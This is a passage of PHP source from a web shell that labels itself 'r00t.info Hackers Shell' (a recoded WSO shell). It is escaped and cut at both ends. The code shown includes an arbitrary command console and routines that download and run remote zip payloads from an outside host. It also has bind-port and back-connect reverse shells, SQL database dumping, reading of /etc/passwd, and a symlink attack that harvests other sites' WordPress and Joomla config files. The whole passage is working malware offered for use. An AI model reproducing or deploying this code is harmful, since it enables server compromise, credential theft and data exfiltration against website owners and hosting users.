if(!@rename($_POST[\'p1\'], $_POST[\'p3\'])) echo \'Can\\\'t rename!<br><script>document.mf.p3.value="";\r\n</script>\';\r\n else die(\'<script>g(null,null,"\'.urlencode($_POST[\'p3\']).\'",null,"")</script>\');\r\n } echo \'<form onsubmit="g(null,null,null,null,this.name.value);\r\nreturn false;\r\n"><input type=text name=name value="\'.htmlspecialchars($_POST[\'p1\']).\'"><input type=submit value=">>"></form>\';\r\n break;\r\n case \'touch\': if( !empty($_POST[\'p3\']) ) { $time = strtotime($_POST[\'p3\']);\r\n if($time) { if(@touch($_POST[\'p1\'],$time,$time)) die(\'<script>g(null,null,null,null,"")</script>\');\r\n else { echo \'Fail!<script>document.mf.p3.value="";\r\n</script>\';\r\n } } else echo \'Bad time format!<script>document.mf.p3.value="";\r\n</script>\';\r\n } echo \'<form onsubmit="g(null,null,null,null,this.touch.value);\r\nreturn false;\r\n"><input type=text name=touch value="\'.date("Y-m-d H:i:s", @filemtime($_POST[\'p1\'])).\'"><input type=submit value=">>"></form>\';\r\n break;\r\n case \'mkfile\': break;\r\n } echo \'</div>\';\r\n printFooter();\r\n } function actionBypass() { printHeader();\r\n if(!file_exists(\'cpanel/cpanel.php\')){ $dizin = \'https://byr00t.co/vb/cpanel.zip\';\r\n function dosya_indir($link,$name=null) { $link_info = pathinfo($link);\r\n $uzanti = strtolower($link_info[\'extension\']);\r\n $file = ($name) ? $name.\'.\'.$uzanti : $link_info[\'basename\'];\r\n $curl = curl_init($link);\r\n $fopen = fopen($file,\'w\');\r\n curl_setopt($curl, CURLOPT_HEADER,0);\r\n curl_setopt($curl, CURLOPT_RETURNTRANSFER,1);\r\n curl_setopt($curl, CURLOPT_HTTP_VERSION,CURL_HTTP_VERSION_1_0);\r\n curl_setopt($curl, CURLOPT_FILE, $fopen);\r\n curl_exec($curl);\r\n curl_close($curl);\r\n fclose($fopen);\r\n } dosya_indir($dizin, "cpanel");\r\n $zip = new ZipArchive();\r\n $file = \'cpanel.zip\';\r\n $zip->open($file);\r\n $cikar = $zip->extractTo(\'cpanel/\');\r\n if(file_exists(\'cpanel.zip\')){ @unlink(\'cpanel.zip\');\r\n } if($cikar){ echo "<iframe src=cpanel/cpanel.php width=100% height=100% frameborder=0></iframe> ";\r\n } else{ echo \'<div class="alert alert-danger"><strong>Hata!</strong> Dosya indirilirken kritik bir hata oluÅŸtu.</div>\';\r\n } } elseif(file_exists(\'cpanel/cpanel.php\')){ echo "<iframe src=cpanel/cpanel.php width=100% height=100% frameborder=0></iframe> ";\r\n } printFooter();\r\n } function actionConsole() { if(isset($_POST[\'ajax\'])) { $_SESSION[md5($_SERVER[\'HTTP_HOST\']).\'ajax\'] = true;\r\n ob_start();\r\n echo "document.cf.cmd.value=\'\';\r\n\\n";\r\n $temp = @iconv($_POST[\'charset\'], \'UTF-8\', addcslashes("\\n$ ".$_POST[\'p1\']."\\n".ex($_POST[\'p1\']),"\\n\\r\\t\\\\\'\\0"));\r\n if(preg_match("!.*cd\\s+([^;\r\n]+)$!",$_POST[\'p1\'],$match)) { if(@chdir($match[1])) { $GLOBALS[\'cwd\'] = @getcwd();\r\n echo "document.mf.c.value=\'".$GLOBALS[\'cwd\']."\';\r\n";\r\n } } echo "document.cf.output.value+=\'".$temp."\';\r\n";\r\n echo "document.cf.output.scrollTop = document.cf.output.scrollHeight;\r\n";\r\n $temp = ob_get_clean();\r\n echo strlen($temp), "\\n", $temp;\r\n exit;\r\n } printHeader();\r\n echo \'<script>\r\nif(window.Event) window.captureEvents(Event.KEYDOWN);\r\n\r\nvar cmds = new Array("");\r\n\r\nvar cur = 0;\r\n\r\nfunction kp(e) {\r\n var n = (window.Event) ? e.which : e.keyCode;\r\n\r\n if(n == 38) {\r\n cur--;\r\n\r\n if(cur>=0)\r\n document.cf.cmd.value = cmds[cur];\r\n\r\n else\r\n cur++;\r\n\r\n } else if(n == 40) {\r\n cur++;\r\n\r\n if(cur < cmds.length)\r\n document.cf.cmd.value = cmds[cur];\r\n\r\n else\r\n cur--;\r\n\r\n }\r\n}\r\nfunction add(cmd) {\r\n cmds.pop();\r\n\r\n cmds.push(cmd);\r\n\r\n cmds.push("");\r\n\r\n cur = cmds.length-1;\r\n\r\n}\r\n</script>\';\r\n echo \'<h1>Console</h1><div class=content><form name=cf onsubmit="if(document.cf.cmd.value==\\\'clear\\\'){document.cf.output.value=\\\'\\\';\r\ndocument.cf.cmd.value=\\\'\\\';\r\nreturn false;\r\n}add(this.cmd.value);\r\nif(this.ajax.checked){a(null,null,this.cmd.value);\r\n}else{g(null,null,this.cmd.value);\r\n} return false;\r\n"><select name=alias>\';\r\n foreach($GLOBALS[\'aliases\'] as $n => $v) { if($v == \'\') { echo \'<optgroup label="-\'.htmlspecialchars($n).\'-"></optgroup>\';\r\n continue;\r\n } echo \'<option value="\'.htmlspecialchars($v).\'">\'.$n.\'</option>\';\r\n } if(empty($_POST[\'ajax\'])&&!empty($_POST[\'p1\'])) $_SESSION[md5($_SERVER[\'HTTP_HOST\']).\'ajax\'] = false;\r\n echo \'</select><input type=button onclick="add(document.cf.alias.value);\r\nif(document.cf.ajax.checked){a(null,null,document.cf.alias.value);\r\n}else{g(null,null,document.cf.alias.value);\r\n}" value=">>"> <input type=checkbox name=ajax value=1 \'.($_SESSION[md5($_SERVER[\'HTTP_HOST\']).\'ajax\']?\'checked\':\'\').\'> send using AJAX<br/><textarea class=bigarea name=output style="border-bottom:0;\r\n" readonly>\';\r\n if(!empty($_POST[\'p1\'])) { echo htmlspecialchars("$ ".$_POST[\'p1\']."\\n".ex($_POST[\'p1\']));\r\n } echo \'</textarea><input type=text name=cmd style="border-top:0;\r\nwidth:100%;\r\n" onkeydown="kp(event);\r\n">\';\r\n echo \'</form></div><script>document.cf.cmd.focus();\r\n</script>\';\r\n printFooter();\r\n } function actionLogout() { unset($_SESSION[md5($_SERVER[\'HTTP_HOST\'])]);\r\n echo \'\r\n <!--r00t.info Hackers Shell-->\r\n <!--Recoded by: Smurfie-->\r\n\r\n\r\n <script>alert("Logout Successful")</script>\r\n <body bgcolor=#ffffff><center><img src="http://r00t.info/shell-dosyalar/logo.png"></center>\r\n <H1><center><p style="color: #DF0101" >r00t.info Hackers Shell</p></H1>\r\n <center>\r\n<iframe src="http://www.facebook.com/plugins/likebox.php?\r\nhref=https://www.facebook.com/r00t.info&\r\nwidth=260&\r\ncolorsche\r\nme=light&\r\nshow_faces=true&\r\nborder_color=\r\n%23fff&\r\nstream=false&\r\nheader=false&\r\nheight=100" scrolling="no" \r\nframeborder="0" style="background:transparent;\r\n border:none;\r\n overflow:hidden;\r\n width:200px;\r\n \r\nheight:100px;\r\n" allowtransparency="true"></iframe></center>\r\n <H3><marquee scrollamount="5" scrolldelay="50" width="100%"><p style="color: #DF0101" >Wso shell</p></marquee></H3></body>\';\r\n } function actionSelfRemove() { printHeader();\r\n if($_POST[\'p1\'] == \'yes\') { if(@unlink(SELF_PATH)) die(\'Shell has been removed\');\r\n else echo \'unlink error!\';\r\n } echo \'<h1>Suicide</h1><div class=content>Really want to remove the shell?<br><a href=# onclick="g(null,null,\\\'yes\\\')">Yes</a></div>\';\r\n printFooter();\r\n } function actionCgi() { printHeader();\r\n if(!file_exists(\'cgi/rot.cin\')){ $dizin = \'https://byr00t.co/vb/cgi.zip\';\r\n function dosya_indir($link,$name=null) { $link_info = pathinfo($link);\r\n $uzanti = strtolower($link_info[\'extension\']);\r\n $file = ($name) ? $name.\'.\'.$uzanti : $link_info[\'basename\'];\r\n $curl = curl_init($link);\r\n $fopen = fopen($file,\'w\');\r\n curl_setopt($curl, CURLOPT_HEADER,0);\r\n curl_setopt($curl, CURLOPT_RETURNTRANSFER,1);\r\n curl_setopt($curl, CURLOPT_HTTP_VERSION,CURL_HTTP_VERSION_1_0);\r\n curl_setopt($curl, CURLOPT_FILE, $fopen);\r\n curl_exec($curl);\r\n curl_close($curl);\r\n fclose($fopen);\r\n } dosya_indir($dizin, "cgi");\r\n $zip = new ZipArchive();\r\n $file = \'cgi.zip\';\r\n $zip->open($file);\r\n $cikar = $zip->extractTo(\'cgi/\');\r\n if(file_exists(\'cgi.zip\')){ @unlink(\'cgi.zip\');\r\n } if($cikar){ chmod(\'cgi/rot.cin\', 0755);\r\n echo "<iframe src=cgi/rot.cin width=100% height=100% frameborder=0></iframe> ";\r\n } else{ echo \'<div class="alert alert-danger"><strong>Hata!</strong> Dosya indirilirken kritik bir hata oluÅŸtu.</div>\';\r\n } } elseif(file_exists(\'cgi/rot.cin\')){ echo "<iframe src=cgi/rot.cin width=100% height=100% frameborder=0></iframe> ";\r\n } printFooter();\r\n } function actionSql() { class DbClass { var $type;\r\n var $link;\r\n var $res;\r\n function DbClass($type) { $this->type = $type;\r\n } function connect($host, $user, $pass, $dbname){ switch($this->type) { case \'mysql\': if( $this->link = @mysql_connect($host,$user,$pass,true) ) return true;\r\n break;\r\n case \'pgsql\': $host = explode(\':\', $host);\r\n if(!$host[1]) $host[1]=5432;\r\n if( $this->link = @pg_connect("host={$host[0]} port={$host[1]} user=$user password=$pass dbname=$dbname") ) return true;\r\n break;\r\n } return false;\r\n } function selectdb($db) { switch($this->type) { case \'mysql\': if (@mysql_select_db($db))return true;\r\n break;\r\n } return false;\r\n } function query($str) { switch($this->type) { case \'mysql\': return $this->res = @mysql_query($str);\r\n break;\r\n case \'pgsql\': return $this->res = @pg_query($this->link,$str);\r\n break;\r\n } return false;\r\n } function fetch() { $res = func_num_args()?func_get_arg(0):$this->res;\r\n switch($this->type) { case \'mysql\': return @mysql_fetch_assoc($res);\r\n break;\r\n case \'pgsql\': return @pg_fetch_assoc($res);\r\n break;\r\n } return false;\r\n } function listDbs() { switch($this->type) { case \'mysql\': return $this->res = @mysql_list_dbs($this->link);\r\n break;\r\n case \'pgsql\': return $this->res = $this->query("SELECT datname FROM pg_database");\r\n break;\r\n } return false;\r\n } function listTables() { switch($this->type) { case \'mysql\': return $this->res = $this->query(\'SHOW TABLES\');\r\n break;\r\n case \'pgsql\': return $this->res = $this->query("select table_name from information_schema.tables where (table_schema != \'information_schema\' AND table_schema != \'pg_catalog\') or table_name = \'pg_user\'");\r\n break;\r\n } return false;\r\n } function error() { switch($this->type) { case \'mysql\': return @mysql_error($this->link);\r\n break;\r\n case \'pgsql\': return @pg_last_error($this->link);\r\n break;\r\n } return false;\r\n } function setCharset($str) { switch($this->type) { case \'mysql\': if(function_exists(\'mysql_set_charset\')) return @mysql_set_charset($str, $this->link);\r\n else $this->query(\'SET CHARSET \'.$str);\r\n break;\r\n case \'mysql\': return @pg_set_client_encoding($this->link, $str);\r\n break;\r\n } return false;\r\n } function dump($table) { switch($this->type) { case \'mysql\': $res = $this->query(\'SHOW CREATE TABLE `\'.$table.\'`\');\r\n $create = mysql_fetch_array($res);\r\n echo $create[1].";\r\n\\n\\n";\r\n $this->query(\'SELECT * FROM `\'.$table.\'`\');\r\n while($item = $this->fetch()) { $columns = array();\r\n foreach($item as $k=>$v) { $item[$k] = "\'".@mysql_real_escape_string($v)."\'";\r\n $columns[] = "`".$k."`";\r\n } echo \'INSERT INTO `\'.$table.\'` (\'.implode(", ", $columns).\') VALUES (\'.implode(", ", $item).\');\r\n\'."\\n";\r\n } break;\r\n case \'pgsql\': $this->query(\'SELECT * FROM \'.$table);\r\n while($item = $this->fetch()) { $columns = array();\r\n foreach($item as $k=>$v) { $item[$k] = "\'".addslashes($v)."\'";\r\n $columns[] = $k;\r\n } echo \'INSERT INTO \'.$table.\' (\'.implode(", ", $columns).\') VALUES (\'.implode(", ", $item).\');\r\n\'."\\n";\r\n } break;\r\n } return false;\r\n } };\r\n $db = new DbClass(@$_POST[\'type\']);\r\n if(@$_POST[\'p2\']==\'download\') { ob_start("ob_gzhandler", 4096);\r\n $db->connect($_POST[\'sql_host\'], $_POST[\'sql_login\'], $_POST[\'sql_pass\'], $_POST[\'sql_base\']);\r\n $db->selectdb($_POST[\'sql_base\']);\r\n header("Content-Disposition: attachment;\r\n filename=dump.sql");\r\n header("Content-Type: text/plain");\r\n foreach($_POST[\'tbl\'] as $v) $db->dump($v);\r\n exit;\r\n } printHeader();\r\n echo \'<h1>Sql browser</h1><div class=content>\r\n <form name="sf" method="post">\r\n <table cellpadding="2" cellspacing="0">\r\n <tr>\r\n <td>Type</td>\r\n <td>Host</td>\r\n <td>Login</td>\r\n <td>Password</td>\r\n <td>Database</td>\r\n <td></td>\r\n </tr>\r\n <tr>\r\n <input type=hidden name=a value=Sql>\r\n <input type=hidden name=p1 value=\\\'query\\\'>\r\n <input type=hidden name=p2>\r\n <input type=hidden name=c value="\'.htmlspecialchars($GLOBALS[\'cwd\']).\'">\r\n <input type=hidden name=charset value="\'.(isset($_POST[\'charset\'])?$_POST[\'charset\']:\'\').\'">\r\n <td>\r\n <select name=\\\'type\\\'>\r\n <option value="mysql" \'.(@$_POST[\'type\']==\'mysql\'?\'selected\':\'\').\'>MySql</option>\r\n <option value="pgsql" \'.(@$_POST[\'type\']==\'pgsql\'?\'selected\':\'\').\'>PostgreSql</option>\r\n </select></td>\r\n <td><input type=text name=sql_host value="\'.(empty($_POST[\'sql_host\'])?\'localhost\':htmlspecialchars($_POST[\'sql_host\'])).\'"></td>\r\n <td><input type=text name=sql_login value="\'.(empty($_POST[\'sql_login\'])?\'root\':htmlspecialchars($_POST[\'sql_login\'])).\'"></td>\r\n <td><input type=text name=sql_pass value="\'.(empty($_POST[\'sql_pass\'])?\'\':htmlspecialchars($_POST[\'sql_pass\'])).\'"></td>\r\n <td>\';\r\n $tmp = "<input type=text name=sql_base value=\'\'>";\r\n if(isset($_POST[\'sql_host\'])){ if($db->connect($_POST[\'sql_host\'], $_POST[\'sql_login\'], $_POST[\'sql_pass\'], $_POST[\'sql_base\'])) { switch($_POST[\'charset\']) { case "Windows-1251": $db->setCharset(\'cp1251\');\r\n break;\r\n case "UTF-8": $db->setCharset(\'utf8\');\r\n break;\r\n case "KOI8-R": $db->setCharset(\'koi8r\');\r\n break;\r\n case "KOI8-U": $db->setCharset(\'koi8u\');\r\n break;\r\n case "cp866": $db->setCharset(\'cp866\');\r\n break;\r\n } $db->listDbs();\r\n echo "<select name=sql_base><option value=\'\'></option>";\r\n while($item = $db->fetch()) { list($key, $value) = each($item);\r\n echo \'<option value="\'.$value.\'" \'.($value==$_POST[\'sql_base\']?\'selected\':\'\').\'>\'.$value.\'</option>\';\r\n } echo \'</select>\';\r\n } else echo $tmp;\r\n }else echo $tmp;\r\n echo \'</td>\r\n <td><input type=submit value=">>"></td>\r\n </tr>\r\n </table>\r\n <script>\r\n function st(t,l) {\r\n document.sf.p1.value = \\\'select\\\';\r\n\r\n document.sf.p2.value = t;\r\n\r\n if(l!=null)document.sf.p3.value = l;\r\n\r\n document.sf.submit();\r\n\r\n }\r\n function is() {\r\n for(i=0;\r\ni<document.sf.elements[\\\'tbl[]\\\'].length;\r\n++i)\r\n document.sf.elements[\\\'tbl[]\\\'][i].checked = !document.sf.elements[\\\'tbl[]\\\'][i].checked;\r\n\r\n }\r\n </script>\';\r\n if(isset($db) && $db->link){ echo "<br/><table width=100% cellpadding=2 cellspacing=0>";\r\n if(!empty($_POST[\'sql_base\'])){ $db->selectdb($_POST[\'sql_base\']);\r\n echo "<tr><td width=1 style=\'border-top:2px solid #666;\r\nborder-right:2px solid #666;\r\n\'><span>Tables:</span><br><br>";\r\n $tbls_res = $db->listTables();\r\n while($item = $db->fetch($tbls_res)) { list($key, $value) = each($item);\r\n $n = $db->fetch($db->query(\'SELECT COUNT(*) as n FROM \'.$value.\'\'));\r\n $value = htmlspecialchars($value);\r\n echo "<nobr><input type=\'checkbox\' name=\'tbl[]\' value=\'".$value."\'> \r\n<a href=# onclick=\\"st(\'".$value."\')\\">".$value."</a> (".$n[\'n\'].")</nobr><br>";\r\n } echo "<input type=\'checkbox\' onclick=\'is();\r\n\'> <input type=button value=\'Dump\' onclick=\'document.sf.p2.value=\\"download\\";\r\ndocument.sf.submit();\r\n\'></td><td style=\'border-top:2px solid #666;\r\n\'>";\r\n if(@$_POST[\'p1\'] == \'select\') { $_POST[\'p1\'] = \'query\';\r\n $db->query(\'SELECT COUNT(*) as n FROM \'.$_POST[\'p2\'].\'\');\r\n $num = $db->fetch();\r\n $num = $num[\'n\'];\r\n echo "<span>".$_POST[\'p2\']."</span> ($num) ";\r\n for($i=0;\r\n$i<($num/30);\r\n$i++) if($i != (int)$_POST[\'p3\']) echo "<a href=\'#\' onclick=\'st(\\"".$_POST[\'p2\']."\\", $i)\'>",($i+1),"</a> ";\r\n else echo ($i+1)," ";\r\n if($_POST[\'type\']==\'pgsql\') $_POST[\'p3\'] = \'SELECT * FROM \'.$_POST[\'p2\'].\' LIMIT 30 OFFSET \'.($_POST[\'p3\']*30);\r\n else $_POST[\'p3\'] = \'SELECT * FROM `\'.$_POST[\'p2\'].\'` LIMIT \'.($_POST[\'p3\']*30).\',30\';\r\n echo "<br><br>";\r\n } if((@$_POST[\'p1\'] == \'query\') && !empty($_POST[\'p3\'])) { $db->query(@$_POST[\'p3\']);\r\n if($db->res !== false) { $title = false;\r\n echo \'<table width=100% cellspacing=0 cellpadding=2 class=main>\';\r\n $line = 1;\r\n while($item = $db->fetch()) { if(!$title) { echo \'<tr>\';\r\n foreach($item as $key => $value) echo \'<th>\'.$key.\'</th>\';\r\n reset($item);\r\n $title=true;\r\n echo \'</tr><tr>\';\r\n $line = 2;\r\n } echo \'<tr class="l\'.$line.\'">\';\r\n $line = $line==1?2:1;\r\n foreach($item as $key => $value) { if($value == null) echo \'<td><i>null</i></td>\';\r\n else echo \'<td>\'.nl2br(htmlspecialchars($value)).\'</td>\';\r\n } echo \'</tr>\';\r\n } echo \'</table>\';\r\n } else { echo \'<div><b>Error:</b> \'.htmlspecialchars($db->error()).\'</div>\';\r\n } } echo "<br><textarea name=\'p3\' style=\'width:100%;\r\nheight:100px\'>".@htmlspecialchars($_POST[\'p3\'])."</textarea><br/><input type=submit value=\'Execute\'>";\r\n echo "</td></tr>";\r\n } echo "</table></form><br/><form onsubmit=\'document.sf.p1.value=\\"loadfile\\";\r\ndocument.sf.p2.value=this.f.value;\r\ndocument.sf.submit();\r\nreturn false;\r\n\'><span>Load file</span> <input class=\'toolsInp\' type=text name=f><input type=submit value=\'>>\'></form>";\r\n if(@$_POST[\'p1\'] == \'loadfile\') { $db->query("SELECT LOAD_FILE(\'".addslashes($_POST[\'p2\'])."\') as file");\r\n $file = $db->fetch();\r\n echo \'<pre class=ml1>\'.htmlspecialchars($file[\'file\']).\'</pre>\';\r\n } } echo \'</div>\';\r\n printFooter();\r\n } function actionNetwork() { printHeader();\r\n $back_connect_c="";\r\n $back_connect_p="";\r\n $bind_port_c="";\r\n $bind_port_p="";\r\n echo \'<h1>Network tools</h1><div class=content>\r\n <form name=\\\'nfp\\\' onSubmit="g(null,null,this.using.value,this.port.value,this.pass.value);\r\nreturn false;\r\n">\r\n <br /><span>Bind port to /bin/sh</span><br/>\r\n Port: <input type=\\\'text\\\' name=\\\'port\\\' value=\\\'443\\\'> Password: <input type=\\\'text\\\' name=\\\'pass\\\' value=\\\'smurf\\\'> Using: <select name="using"><option value=\\\'bpc\\\'>C</option><option value=\\\'bpp\\\'>Perl</option></select> <input type=submit value=">>">\r\n </form>\r\n <form name=\\\'nfp\\\' onSubmit="g(null,null,this.using.value,this.server.value,this.port.value);\r\nreturn false;\r\n">\r\n <br /><br /><span>Back-connect to</span><br/>\r\n Server: <input type=\\\'text\\\' name=\\\'server\\\' value="\'.$_SERVER[\'REMOTE_ADDR\'].\'"> Port: <input type=\\\'text\\\' name=\\\'port\\\' value=\\\'443\\\'> Using: <select name="using"><option value=\\\'bcc\\\'>C</option><option value=\\\'bcp\\\'>Perl</option></select> <input type=submit value=">>">\r\n </form><br>\';\r\n if(isset($_POST[\'p1\'])) { function cf($f,$t) { $w=@fopen($f,"w") or @function_exists(\'file_put_contents\');\r\n if($w) { @fwrite($w,@base64_decode($t)) or @fputs($w,@base64_decode($t)) or @file_put_contents($f,@base64_decode($t));\r\n @fclose($w);\r\n } } if($_POST[\'p1\'] == \'bpc\') { cf("/tmp/bp.c",$bind_port_c);\r\n $out = ex("gcc -o /tmp/bp /tmp/bp.c");\r\n @unlink("/tmp/bp.c");\r\n $out .= ex("/tmp/bp ".$_POST[\'p2\']." ".$_POST[\'p3\']." &");\r\n echo "<pre class=ml1>$out\\n".ex("ps aux | grep bp")."</pre>";\r\n } if($_POST[\'p1\'] == \'bpp\') { cf("/tmp/bp.pl",$bind_port_p);\r\n $out = ex(which("perl")." /tmp/bp.pl ".$_POST[\'p2\']." &");\r\n echo "<pre class=ml1>$out\\n".ex("ps aux | grep bp.pl")."</pre>";\r\n } if($_POST[\'p1\'] == \'bcc\') { cf("/tmp/bc.c",$back_connect_c);\r\n $out = ex("gcc -o /tmp/bc /tmp/bc.c");\r\n @unlink("/tmp/bc.c");\r\n $out .= ex("/tmp/bc ".$_POST[\'p2\']." ".$_POST[\'p3\']." &");\r\n echo "<pre class=ml1>$out\\n".ex("ps aux | grep bc")."</pre>";\r\n } if($_POST[\'p1\'] == \'bcp\') { cf("/tmp/bc.pl",$back_connect_p);\r\n $out = ex(which("perl")." /tmp/bc.pl ".$_POST[\'p2\']." ".$_POST[\'p3\']." &");\r\n echo "<pre class=ml1>$out\\n".ex("ps aux | grep bc.pl")."</pre>";\r\n } } echo \'</div>\';\r\n printFooter();\r\n } function actionPortScanner() { printHeader();\r\n echo \'<h1>Port Scanner</h1>\';\r\n echo \'<div class="content">\';\r\n echo \'<form action="" method="post">\';\r\n if(isset($_POST[\'host\']) && is_numeric($_POST[\'end\']) && is_numeric($_POST[\'start\'])){ $start = strip_tags($_POST[\'start\']);\r\n $end = strip_tags($_POST[\'end\']);\r\n $host = strip_tags($_POST[\'host\']);\r\n for($i = $start;\r\n $i<=$end;\r\n $i++){ $fp = @fsockopen($host, $i, $errno, $errstr, 3);\r\n if($fp){ echo \'Port \'.$i.\' is <font color=green>open</font><br>\';\r\n } flush();\r\n } } else { echo \'<br /><br /><center><input type="hidden" name="a" value="PortScanner"><input type="hidden" name=p1><input type="hidden" name="p2">\r\n <input type="hidden" name="c" value="\'.htmlspecialchars($GLOBALS[\'cwd\']).\'">\r\n <input type="hidden" name="charset" value="\'.(isset($_POST[\'charset\'])?$_POST[\'charset\']:\'\').\'">\r\n Host: <input type="text" name="host" value="localhost"/><br /><br />\r\n Port start: <input type="text" name="start" value="0"/><br /><br />\r\n Port end:<input type="text" name="end" value="5000"/><br /><br />\r\n <input type="submit" value="Scan Ports" />\r\n </form></center><br /><br />\';\r\n } echo \'</div>\';\r\n printFooter();\r\n } function actionReadable() { printHeader();\r\n echo \'<h1>Readable Dirs</h1>\';\r\n echo \'<div class="content">\';\r\n $sm = ini_get(\'safe_mode\');\r\n if($sm) { echo \'<br /><b>Error: safe_mode = on</b><br /><br />\';\r\n } else { @$passwd = fopen(\'/etc/passwd\',\'r\');\r\n if (!$passwd) { echo \'<br /><b>[-] Error : coudn`t read /etc/passwd</b><br /><br />\';\r\n } else { $pub = array();\r\n $users = array();\r\n $conf = array();\r\n $i = 0;\r\n while(!feof($passwd)) { $str = fgets($passwd);\r\n if ($i > 35) { $pos = strpos($str,\':\');\r\n $username = substr($str,0,$pos);\r\n $dirz = \'/home/\'.$username.\'/public_html/\';\r\n if (($username != \'\')) { if (is_readable($dirz)) { array_push($users,$username);\r\n array_push($pub,$dirz);\r\n } } } $i++;\r\n } echo \'<br><br>\';\r\n echo "[+] Founded ".sizeof($users)." entrys in /etc/passwd\\n"."<br />";\r\n echo "[+] Founded ".sizeof($pub)." readable public_html directories\\n"."<br /><br /><br />";\r\n foreach ($users as $user) { $path = "/home/$user/public_html/";\r\n echo $path."<br>";\r\n } echo "<br /><br /><br />[+] Complete...\\n"."<br />";\r\n } } echo \'</div>\';\r\n printFooter();\r\n } function actionSymlink() { printHeader();\r\n echo \'<h1>Symlink</h1>\';\r\n $furl = \'http://\'.$_SERVER[\'SERVER_NAME\'].$_SERVER[\'REQUEST_URI\'];\r\n $expld = explode(\'/\',$furl );\r\n $burl =str_replace(end($expld),\'\',$furl);\r\n echo \'<div class="content"><center>\r\n <h3>[ <a href="#" onclick="g(\\\'symlink\\\',null,\\\'website\\\',null)">Domains</a> ] - \r\n [ <a href="#" onclick="g(\\\'symlink\\\',null,\\\'whole\\\',null)">Whole Server Symlink</a> ] - \r\n [ <a href="#" onclick="g(\\\'symlink\\\',null,\\\'config\\\',null)">Config files symlink</a> ]</h3></center>\';\r\n if(isset($_POST[\'p1\']) && $_POST[\'p1\']==\'website\') { echo "<center>";\r\n $d0mains = @file("/etc/named.conf");\r\n if(!$d0mains){ echo "<pre class=ml1 style=\'margin-top:5px\'>Cant access this file on server -> [ /etc/named.conf ]</pre></center>";\r\n } else { echo "<table align=center class=\'main\' border=0 ><tr><th> Count </th><th> Domains </th><th> Users </th></tr>";\r\n $unk = array();\r\n foreach($d0mains as $d0main){ if(@eregi("zone",$d0main)){ preg_match_all(\'#zone "(.*)"#\', $d0main, $domains);\r\n flush();\r\n if(strlen(trim($domains[1][0])) > 2){ $unk[] = $domains[1][0];\r\n flush();\r\n } } } $count=1;\r\n $unk = array_unique($unk);\r\n $l=0;\r\n foreach($unk as $d){ $user = posix_getpwuid(@fileowner("/etc/valiases/".$d));\r\n echo "<tr".($l?\' class=l1\':\'\')."><td>".$count."</td><td><a href=http://".$d."/>".$d."</a></td><td>".$user[\'name\']."</td></tr>";\r\n flush();\r\n $count++;\r\n $l=$l?0:1;\r\n } echo "</table>";\r\n } echo "</center>";\r\n } if(isset($_POST[\'p1\']) && $_POST[\'p1\']==\'whole\') { echo "<center>";\r\n @mkdir(\'sym\',0777);\r\n $hdt = "Options all \\n DirectoryIndex Sux.html \\n AddType text/plain .php \\n AddHandler server-parsed .php \\n AddType text/plain .html \\n AddHandler txt .html \\n Require None \\n Satisfy Any";\r\n $hfp =@fopen (\'sym/.htaccess\',\'w\');\r\n fwrite($hfp ,$hdt);\r\n if(function_exists(\'symlink\')) { @symlink(\'/\',\'sym/root\');\r\n } $d0mains = @file(\'/etc/named.conf\');\r\n if(!$d0mains) { echo "<pre class=ml1 style=\'margin-top:5px\'># Cant access this file on server -> [ /etc/named.conf ]</pre></center>";\r\n } else { echo "<table align=\'center\' width=\'40%\' class=\'main\'><tr><th> Count </th><th> Domains </th><th> User </th><th> Symlink </th></tr>";\r\n $count=1;\r\n $mck = array();\r\n foreach($d0mains as $d0main){ if(@eregi(\'zone\',$d0main)){ preg_match_all(\'#zone "(.*)"#\',$d0main,$domain);\r\n flush();\r\n if(strlen(trim($domain[1][0])) >2){ $mck[] = $domain[1][0];\r\n } } } $mck = array_unique($mck);\r\n $l=0;\r\n foreach($mck as $d) { $user = posix_getpwuid(@fileowner(\'/etc/valiases/\'.$d));\r\n $ddt = $user[\'name\'];\r\n $ddt = $d;\r\n if(@eregi("\\.ir",$d) or @eregi("\\.il",$d)) { $ddt = "<div style=\' color: #FF0000 ;\r\n text-shadow: 0px 0px 1px red;\r\n \'>".$d.\'</div>\';\r\n } echo "<tr".($l?\' class=l1\':\'\')."><td>".$count++."</td><td><a target=\'_blank\' href=http://".$d.\'/>\'.$ddt.\' </a></td><td>\'.$user[\'name\']."</td><td><a href=\'sym/root/home/".$user[\'name\']."/public_html\' target=\'_blank\'>symlink </a></td></tr>";\r\n flush();\r\n $l=$l?0:1;\r\n } echo \'</table>\';\r\n } echo "</center>";\r\n } if(isset($_POST[\'p1\']) && $_POST[\'p1\']==\'config\') { echo "<center>";\r\n @mkdir(\'sym\',0777);\r\n $hdt = "Options all \\n DirectoryIndex Sux.html \\n AddType text/plain .php \\n AddHandler server-parsed .php \\n AddType text/plain .html \\n AddHandler txt .html \\n Require None \\n Satisfy Any";\r\n $hfp = @fopen (\'sym/.htaccess\',\'w\');\r\n @fwrite($hfp ,$hdt);\r\n if(function_exists(\'symlink\')) { @symlink(\'/\',\'sym/root\');\r\n } $d0mains = @file(\'/etc/named.conf\');\r\n if(!$d0mains) { echo "<pre class=ml1 style=\'margin-top:5px\'># Cant access this file on server -> [ /etc/named.conf ]</pre></center>";\r\n } else { echo "<table align=\'center\' width=\'40%\' class=\'main\' ><tr><th> Count </th><th> Domains </th><th> Script </th></tr>";\r\n $count = 1;\r\n $l=0;\r\n foreach($d0mains as $d0main){ if(@eregi(\'zone\',$d0main)){ preg_match_all(\'#zone "(.*)"#\',$d0main,$domain);\r\n flush();\r\n if(strlen(trim($domain[1][0]))>2){ $user = posix_getpwuid(@fileowner(\'/etc/valiases/\'.$domain[1][0]));\r\n $c1 = $burl.\'/sym/root/home/\'.$user[\'name\'].\'/public_html/wp-config.php\';\r\n $ch01 = get_headers($c1);\r\n $cf01 = $ch01[0];\r\n $c2 = $burl.\'/sym/root/home/\'.$user[\'name\'].\'/public_html/blog/wp-config.php\';\r\n $ch02 = get_headers($c2);\r\n $cf02 = $ch02[0];\r\n $c3 = $burl.\'/sym/root/home/\'.$user[\'name\'].\'/public_html/configuration.php\';\r\n $ch03 = get_headers($c3);\r\n $cf03 = $ch03[0];\r\n $c4 = $burl.\'/sym/root/home/\'.$user[\'name\'].\'/public_html/joomla/configuration.php\';\r\n $ch04 = get_headers($c4);\r\n $cf04 = $ch04[0];\r\n $c5 = $burl.\'/sym/root/home/\'.$user[\'name\'].\'/public_html/includes/config.php\';\r\n $ch05 = get_headers($c5);\r\n $cf05 = $ch05[0];\r\n $c6 = $burl.\'/sym/root/home/\'.$user[\'name\'].\'/public_html/vb/includes/config.php\';\r\n $ch06 = get_headers($c6);\r\n $cf06 = $ch06[0];\r\n $c7 = 